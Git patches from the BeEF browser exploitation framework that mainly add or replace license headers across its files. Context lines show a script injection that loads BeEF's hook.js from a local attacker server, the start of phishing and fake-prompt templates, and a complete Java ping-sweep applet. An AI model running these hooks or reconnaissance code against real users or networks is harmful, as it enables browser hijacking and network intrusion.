+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
 
diff --git a/test/unit/ts_unit.rb b/test/unit/ts_unit.rb
index 3ddc745b3..9012cee11 100644
--- a/test/unit/ts_unit.rb
+++ b/test/unit/ts_unit.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 # Common lib for BeEF tests
diff --git a/update-beef b/update-beef
index 4524a540f..e5d775fb5 100755
--- a/update-beef
+++ b/update-beef
@@ -1,18 +1,8 @@
 #!/bin/bash
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 echo Updating...

From 23f09b919f4bf6617a6923a3da425962a8d45ff0 Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Fri, 2 Nov 2012 14:26:10 +1000
Subject: [PATCH 094/397] Changed license header

---
 .../controllers/authentication/index.html     |   5 +
 .../admin_ui/controllers/panel/index.html     |   5 +
 .../media/javascript/esapi/Class.create.js    |   6 +
 .../media/javascript/wterm/wterm.jquery.js    |   6 +
 extensions/customhook/html/index.html         |   5 +
 extensions/demos/chrome_extension/index.html  |   5 +
 .../chrome_extension/persistent_tab.html      |   5 +
 .../background.js                             |   6 +
 extensions/demos/html/basic.html              |   5 +
 extensions/demos/html/butcher/index.html      |   5 +
 .../demos/html/butcher/secret_page.html       |   5 +
 extensions/demos/html/checkJava.java          |   6 +
 .../html/clickjacking/clickjack_attack.html   |   5 +
 .../html/clickjacking/clickjack_victim.html   |   5 +
 extensions/demos/html/plain.html              |   5 +
 extensions/demos/html/report.html             |   5 +
 extensions/demos/html/secret_page.html        |   5 +
 .../chrome/content/linkTargetFinder.js        |   6 +
 .../defaults/preferences/prefs.js             |   6 +
 .../ipec/files/LinkTargetFinder/skin/skin.css |   6 +
 .../mass_mailer/templates/default/mail.html   |   5 +
 .../mass_mailer/templates/edfenergy/mail.html |   5 +
 .../host/get_internal_ip/get_internal_ip.java |   6 +
 .../get_physical_location/getGPSLocation.java |   6 +
 .../host/get_system_info/getSystemInfo.java   |   6 +
 .../get_wireless_keys/wirelessZeroConfig.java |   6 +
 .../network/ping_sweep_java/pingSweep.java    | 160 +++++++++---------
 .../simple_hijacker/templates/amazon.js       |   6 +
 .../templates/chromecertbeggar.js             |   6 +
 .../templates/chromecertbeggar2.js            |   6 +
 .../simple_hijacker/templates/confirmbox.js   |   6 +
 .../simple_hijacker/templates/credential.js   |   6 +
 test/common/beef_test.rb                      |   7 +-
 test/common/test_constants.rb                 |   7 +-
 test/integration/check_environment.rb         |   7 +-
 test/integration/tc_debug_modules.rb          |   5 +
 test/integration/tc_login.rb                  |   5 +
 test/thirdparty/msf/unit/check_environment.rb |   7 +-
 38 files changed, 288 insertions(+), 81 deletions(-)

diff --git a/extensions/admin_ui/controllers/authentication/index.html b/extensions/admin_ui/controllers/authentication/index.html
index 7e0dff715..c2c8e3ef9 100644
--- a/extensions/admin_ui/controllers/authentication/index.html
+++ b/extensions/admin_ui/controllers/authentication/index.html
@@ -1,3 +1,8 @@
+<!--
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+-->
 <html>
 <head>
 	<title>BeEF Authentication</title>
diff --git a/extensions/admin_ui/controllers/panel/index.html b/extensions/admin_ui/controllers/panel/index.html
index c49b0c3d5..4091f664d 100644
--- a/extensions/admin_ui/controllers/panel/index.html
+++ b/extensions/admin_ui/controllers/panel/index.html
@@ -1,3 +1,8 @@
+<!--
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+-->
 <html>
 <head>
 
diff --git a/extensions/admin_ui/media/javascript/esapi/Class.create.js b/extensions/admin_ui/media/javascript/esapi/Class.create.js
index 4c7d8891b..81fc6ad5e 100644
--- a/extensions/admin_ui/media/javascript/esapi/Class.create.js
+++ b/extensions/admin_ui/media/javascript/esapi/Class.create.js
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
         /* Simple JavaScript Inheritance
          * By John Resig http://ejohn.org/
          * MIT Licensed.
diff --git a/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js b/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
index cce76761f..4ca740001 100644
--- a/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
+++ b/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 /**
  * @Author :        venkatakrishnan ganesh
  * @file   :        wterm.jquery.js
diff --git a/extensions/customhook/html/index.html b/extensions/customhook/html/index.html
index c1acd833a..0c4aee29b 100644
--- a/extensions/customhook/html/index.html
+++ b/extensions/customhook/html/index.html
@@ -1,3 +1,8 @@
+<!--
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+-->
 <html>
 <head>
 	<title><%= @customhook_title %></title>
diff --git a/extensions/demos/chrome_extension/index.html b/extensions/demos/chrome_extension/index.html
index 1edb829c0..702914d70 100644
--- a/extensions/demos/chrome_extension/index.html
+++ b/extensions/demos/chrome_extension/index.html
@@ -1,3 +1,8 @@
+<!--
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+-->
 <!doctype html>
 <html>
 <head>
diff --git a/extensions/demos/chrome_extension/persistent_tab.html b/extensions/demos/chrome_extension/persistent_tab.html
index 836354aae..65a992234 100644
--- a/extensions/demos/chrome_extension/persistent_tab.html
+++ b/extensions/demos/chrome_extension/persistent_tab.html
@@ -1,3 +1,8 @@
+<!--
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+-->
 <!doctype html>
 <html>
 <head>
diff --git a/extensions/demos/flash_update_chrome_extension/background.js b/extensions/demos/flash_update_chrome_extension/background.js
index e20376b0e..808322d68 100644
--- a/extensions/demos/flash_update_chrome_extension/background.js
+++ b/extensions/demos/flash_update_chrome_extension/background.js
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 d=document;
 e=d.createElement('script');
 e.src="http://127.0.0.1:3000/hook.js";
diff --git a/extensions/demos/html/basic.html b/extensions/demos/html/basic.html
index f058afc95..c1920bed3 100644
--- a/extensions/demos/html/basic.html
+++ b/extensions/demos/html/basic.html
@@ -1,3 +1,8 @@
+<!--
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+-->
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
 <html>
 <head>
diff --git a/extensions/demos/html/butcher/index.html b/extensions/demos/html/butcher/index.html
index abede7df6..5c7b8264b 100644
--- a/extensions/demos/html/butcher/index.html
+++ b/extensions/demos/html/butcher/index.html
@@ -1,3 +1,8 @@
+<!--
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+-->
 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
    "http://www.w3.org/TR/html4/loose.dtd">
 
diff --git a/extensions/demos/html/butcher/secret_page.html b/extensions/demos/html/butcher/secret_page.html
index cf295841d..328d1d06f 100644
--- a/extensions/demos/html/butcher/secret_page.html
+++ b/extensions/demos/html/butcher/secret_page.html
@@ -1,3 +1,8 @@
+<!--
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+-->
 <html>
 <head>
 	<title>Secret Page</title>
diff --git a/extensions/demos/html/checkJava.java b/extensions/demos/html/checkJava.java
index c618ce069..a936e5733 100755
--- a/extensions/demos/html/checkJava.java
+++ b/extensions/demos/html/checkJava.java
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 import java.io.*;  
 import java.util.*;
 import java.net.*;
diff --git a/extensions/demos/html/clickjacking/clickjack_attack.html b/extensions/demos/html/clickjacking/clickjack_attack.html
index df86106e6..a526b7c6c 100644
--- a/extensions/demos/html/clickjacking/clickjack_attack.html
+++ b/extensions/demos/html/clickjacking/clickjack_attack.html
@@ -1,3 +1,8 @@
+<!--
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+-->
 
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
diff --git a/extensions/demos/html/clickjacking/clickjack_victim.html b/extensions/demos/html/clickjacking/clickjack_victim.html
index afd388f90..5024b0f15 100644
--- a/extensions/demos/html/clickjacking/clickjack_victim.html
+++ b/extensions/demos/html/clickjacking/clickjack_victim.html
@@ -1,3 +1,8 @@
+<!--
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+-->
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
 <head>
diff --git a/extensions/demos/html/plain.html b/extensions/demos/html/plain.html
index ff8ec25c3..1a37a3820 100644
--- a/extensions/demos/html/plain.html
+++ b/extensions/demos/html/plain.html
@@ -1,3 +1,8 @@
+<!--
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+-->
 <script>
 var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
 document.write(commandModuleStr);
diff --git a/extensions/demos/html/report.html b/extensions/demos/html/report.html
index b7f7d8737..e16c2bc2f 100755
--- a/extensions/demos/html/report.html
+++ b/extensions/demos/html/report.html
@@ -1,3 +1,8 @@
+<!--
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+-->
 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
 <html><head>
 <title>Loading</title>
diff --git a/extensions/demos/html/secret_page.html b/extensions/demos/html/secret_page.html
index 2fa35f875..b879813d0 100644
--- a/extensions/demos/html/secret_page.html
+++ b/extensions/demos/html/secret_page.html
@@ -1,3 +1,8 @@
+<!--
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+-->
 <html>
 <head>
 	<title>Secret Page</title>
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js b/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
index 8c86ef860..144bca0a5 100644
--- a/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
+++ b/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 var linkTargetFinder = function () {
 	var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
 	return {
diff --git a/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js b/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
index cbe9a6dd9..8bb7b4361 100644
--- a/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
+++ b/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 // see http://kb.mozillazine.org/Firefox_:_FAQs_:_About:config_Entries
 // see http://mike.kaply.com/2012/06/21/best-practices-for-overriding-the-new-tab-page-with-your-extension/
 pref("extensions.linktargetfinder.autorun", false);
diff --git a/extensions/ipec/files/LinkTargetFinder/skin/skin.css b/extensions/ipec/files/LinkTargetFinder/skin/skin.css
index c82d15f49..fb903aa6a 100644
--- a/extensions/ipec/files/LinkTargetFinder/skin/skin.css
+++ b/extensions/ipec/files/LinkTargetFinder/skin/skin.css
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 #link-target-finder-toolbar-button {
 	list-style-image: url("chrome://linktargetfinder/skin/toolbar-large.png");
 }
diff --git a/extensions/social_engineering/mass_mailer/templates/default/mail.html b/extensions/social_engineering/mass_mailer/templates/default/mail.html
index a99c840cb..62b21ab63 100644
--- a/extensions/social_engineering/mass_mailer/templates/default/mail.html
+++ b/extensions/social_engineering/mass_mailer/templates/default/mail.html
@@ -1,3 +1,8 @@
+<!--
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+-->
 <html>
 <head>
 <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html b/extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html
index 1b93c888f..6b27b73bf 100644
--- a/extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html
+++ b/extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html
@@ -1,3 +1,8 @@
+<!--
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+-->
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
 <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF8">
    <meta name="Generator" content="StreamServe MailOUT"><title>
diff --git a/modules/host/get_internal_ip/get_internal_ip.java b/modules/host/get_internal_ip/get_internal_ip.java
index 2882d1de1..f783260a3 100755
--- a/modules/host/get_internal_ip/get_internal_ip.java
+++ b/modules/host/get_internal_ip/get_internal_ip.java
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 import java.applet.Applet;
 import java.applet.AppletContext;
 import java.net.InetAddress;
diff --git a/modules/host/get_physical_location/getGPSLocation.java b/modules/host/get_physical_location/getGPSLocation.java
index 0a1fb02ad..8491a7895 100755
--- a/modules/host/get_physical_location/getGPSLocation.java
+++ b/modules/host/get_physical_location/getGPSLocation.java
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 import java.io.*;  
 import java.util.*;
 import java.net.*;
diff --git a/modules/host/get_system_info/getSystemInfo.java b/modules/host/get_system_info/getSystemInfo.java
index e6f0f06f4..1d07209f2 100644
--- a/modules/host/get_system_info/getSystemInfo.java
+++ b/modules/host/get_system_info/getSystemInfo.java
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 import java.applet.*;
 import java.awt.*;
 import java.net.*;
diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.java b/modules/host/get_wireless_keys/wirelessZeroConfig.java
index 8349d64a2..5e05365dd 100644
--- a/modules/host/get_wireless_keys/wirelessZeroConfig.java
+++ b/modules/host/get_wireless_keys/wirelessZeroConfig.java
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 import java.io.*;  
 import java.util.*;
 import java.net.*;
diff --git a/modules/network/ping_sweep_java/pingSweep.java b/modules/network/ping_sweep_java/pingSweep.java
index 0459ebc6a..ea0b31076 100644
--- a/modules/network/ping_sweep_java/pingSweep.java
+++ b/modules/network/ping_sweep_java/pingSweep.java
@@ -1,77 +1,83 @@
-import java.applet.Applet;
-import java.io.IOException;
-import java.net.InetAddress;
-import java.net.UnknownHostException;
-import java.util.ArrayList;
-import java.util.List;
-
-/*
- * Coded by Michele "antisnatchor" Orru' for the BeEF project.
- * Given a single IP or IP range, check without hosts are alive (ping sweep).
- */
-public class pingSweep extends Applet {
-
-    public static String ipRange = "";
-    public static int timeout = 0;
-    public static List<InetAddress> hostList;
-
-    public pingSweep() {
-        super();
-        return;
-    }
-
-    public void init(){
-       ipRange = getParameter("ipRange");
-       timeout = Integer.parseInt(getParameter("timeout"));
-    }
-
-    //called from JS
-    public static int getHostsNumber(){
-        try{
-            hostList = parseIpRange(ipRange);
-        }catch(UnknownHostException e){ //do something
-
-        }
-        return hostList.size();
-    }
-
-    //called from JS
-    public static String getAliveHosts(){
-        String result = "";
-        try{
-           result = checkHosts(hostList);
-        }catch(IOException io){
-           //do something
-        }
-        return result;
-    }
-
-    private static List<InetAddress> parseIpRange(String ipRange) throws UnknownHostException {
-
-        List<InetAddress> addresses = new ArrayList<InetAddress>();
-        if (ipRange.indexOf("-") != -1) { //multiple IPs: ipRange = 172.31.229.240-172.31.229.250
-            String[] ips = ipRange.split("-");
-            String[] octets = ips[0].split("\\.");
-            int lowerBound = Integer.parseInt(octets[3]);
-            int upperBound = Integer.parseInt(ips[1].split("\\.")[3]);
-
-            for (int i = lowerBound; i <= upperBound; i++) {
-                String ip = octets[0] + "." + octets[1] + "." + octets[2] + "." + i;
-                addresses.add(InetAddress.getByName(ip));
-            }
-        } else { //single ip: ipRange = 172.31.229.240
-            addresses.add(InetAddress.getByName(ipRange));
-        }
-        return addresses;
-    }
-
-    private static String checkHosts(List<InetAddress> inetAddresses) throws IOException {
-        String alive = "";
-        for (InetAddress inetAddress : inetAddresses) {
-            if (inetAddress.isReachable(timeout)) {
-                alive += inetAddress.toString() + "\n";
-            }
-        }
-        return alive;
-    }
-}
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
+import java.applet.Applet;
+import java.io.IOException;
+import java.net.InetAddress;
+import java.net.UnknownHostException;
+import java.util.ArrayList;
+import java.util.List;
+
+/*
+ * Coded by Michele "antisnatchor" Orru' for the BeEF project.
+ * Given a single IP or IP range, check without hosts are alive (ping sweep).
+ */
+public class pingSweep extends Applet {
+
+    public static String ipRange = "";
+    public static int timeout = 0;
+    public static List<InetAddress> hostList;
+
+    public pingSweep() {
+        super();
+        return;
+    }
+
+    public void init(){
+       ipRange = getParameter("ipRange");
+       timeout = Integer.parseInt(getParameter("timeout"));
+    }
+
+    //called from JS
+    public static int getHostsNumber(){
+        try{
+            hostList = parseIpRange(ipRange);
+        }catch(UnknownHostException e){ //do something
+
+        }
+        return hostList.size();
+    }
+
+    //called from JS
+    public static String getAliveHosts(){
+        String result = "";
+        try{
+           result = checkHosts(hostList);
+        }catch(IOException io){
+           //do something
+        }
+        return result;
+    }
+
+    private static List<InetAddress> parseIpRange(String ipRange) throws UnknownHostException {
+
+        List<InetAddress> addresses = new ArrayList<InetAddress>();
+        if (ipRange.indexOf("-") != -1) { //multiple IPs: ipRange = 172.31.229.240-172.31.229.250
+            String[] ips = ipRange.split("-");
+            String[] octets = ips[0].split("\\.");
+            int lowerBound = Integer.parseInt(octets[3]);
+            int upperBound = Integer.parseInt(ips[1].split("\\.")[3]);
+
+            for (int i = lowerBound; i <= upperBound; i++) {
+                String ip = octets[0] + "." + octets[1] + "." + octets[2] + "." + i;
+                addresses.add(InetAddress.getByName(ip));
+            }
+        } else { //single ip: ipRange = 172.31.229.240
+            addresses.add(InetAddress.getByName(ipRange));
+        }
+        return addresses;
+    }
+
+    private static String checkHosts(List<InetAddress> inetAddresses) throws IOException {
+        String alive = "";
+        for (InetAddress inetAddress : inetAddresses) {
+            if (inetAddress.isReachable(timeout)) {
+                alive += inetAddress.toString() + "\n";
+            }
+        }
+        return alive;
+    }
+}
diff --git a/modules/social_engineering/simple_hijacker/templates/amazon.js b/modules/social_engineering/simple_hijacker/templates/amazon.js
index 0c58ba121..f999f8ce5 100644
--- a/modules/social_engineering/simple_hijacker/templates/amazon.js
+++ b/modules/social_engineering/simple_hijacker/templates/amazon.js
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
   beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
 	$j(document).attr('title', $j(this).html());
 	document.body.scroll = 'no';
diff --git a/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
index 15bef871b..77db95dc0 100644
--- a/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
+++ b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
   // floating div
 	function writediv() {
 		sneakydiv = document.createElement('div');
diff --git a/modules/social_engineering/simple_hijacker/templates/chromecertbeggar2.js b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar2.js
index 10313456e..47dec476a 100644
--- a/modules/social_engineering/simple_hijacker/templates/chromecertbeggar2.js
+++ b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar2.js
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
   getDomain = function(url){
     return url.match(/:\/\/(www\.)?(.[^/:]+)/)[2];
   }  
diff --git a/modules/social_engineering/simple_hijacker/templates/confirmbox.js b/modules/social_engineering/simple_hijacker/templates/confirmbox.js
index d8c79bc7b..b7f89b47e 100644
--- a/modules/social_engineering/simple_hijacker/templates/confirmbox.js
+++ b/modules/social_engineering/simple_hijacker/templates/confirmbox.js
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 var answer = confirm("Do you really want to leave us ??")
 if (answer){
 	alert("Okay :(")
diff --git a/modules/social_engineering/simple_hijacker/templates/credential.js b/modules/social_engineering/simple_hijacker/templates/credential.js
index d0b1eacb0..e18a21a62 100644
--- a/modules/social_engineering/simple_hijacker/templates/credential.js
+++ b/modules/social_engineering/simple_hijacker/templates/credential.js
@@ -1,3 +1,9 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 	imgr = "http://0.0.0.0:3000/ui/media/images/beef.png";
 	var answer= '';
 	
diff --git a/test/common/beef_test.rb b/test/common/beef_test.rb
index 2b15fbbe2..51def3f77 100644
--- a/test/common/beef_test.rb
+++ b/test/common/beef_test.rb
@@ -1,3 +1,8 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
 require 'test/unit'
 
 require 'capybara'
@@ -41,4 +46,4 @@ class BeefTest
     victim
   end
 
-end
+end
\ No newline at end of file
diff --git a/test/common/test_constants.rb b/test/common/test_constants.rb
index 322010219..d5f487807 100644
--- a/test/common/test_constants.rb
+++ b/test/common/test_constants.rb
@@ -1,3 +1,8 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
 BEEF_TEST_DIR = "/tmp/beef-test/"
 
 # General constants
@@ -14,4 +19,4 @@ BEEF_PASSWD = "beef"
 RESTAPI_HOOKS = "http://" + ATTACK_DOMAIN + ":3000/api/hooks"
 RESTAPI_LOGS = "http://" + ATTACK_DOMAIN + ":3000/api/logs"
 RESTAPI_MODULES = "http://" + ATTACK_DOMAIN + ":3000/api/modules"
-RESTAPI_ADMIN = "http://" + ATTACK_DOMAIN + ":3000/api/admin"
+RESTAPI_ADMIN = "http://" + ATTACK_DOMAIN + ":3000/api/admin"
\ No newline at end of file
diff --git a/test/integration/check_environment.rb b/test/integration/check_environment.rb
index 3594ba117..0eeb7190d 100644
--- a/test/integration/check_environment.rb
+++ b/test/integration/check_environment.rb
@@ -1,3 +1,8 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
 require 'test/unit'
 
 class TC_CheckEnvironment < Test::Unit::TestCase
@@ -7,4 +12,4 @@ class TC_CheckEnvironment < Test::Unit::TestCase
 
   end
 
-end
\ No newline at end of file
+end
diff --git a/test/integration/tc_debug_modules.rb b/test/integration/tc_debug_modules.rb
index e1547b7c7..2b0ec4b50 100644
--- a/test/integration/tc_debug_modules.rb
+++ b/test/integration/tc_debug_modules.rb
@@ -1,3 +1,8 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
 require 'test/unit'
 require 'rest_client'
 require 'json'
diff --git a/test/integration/tc_login.rb b/test/integration/tc_login.rb
index b4abe766b..72178dae2 100644
--- a/test/integration/tc_login.rb
+++ b/test/integration/tc_login.rb
@@ -1,3 +1,8 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
 require 'test/unit'
 require '../common/test_constants'
 require '../common/beef_test'
diff --git a/test/thirdparty/msf/unit/check_environment.rb b/test/thirdparty/msf/unit/check_environment.rb
index 3594ba117..0eeb7190d 100644
--- a/test/thirdparty/msf/unit/check_environment.rb
+++ b/test/thirdparty/msf/unit/check_environment.rb
@@ -1,3 +1,8 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
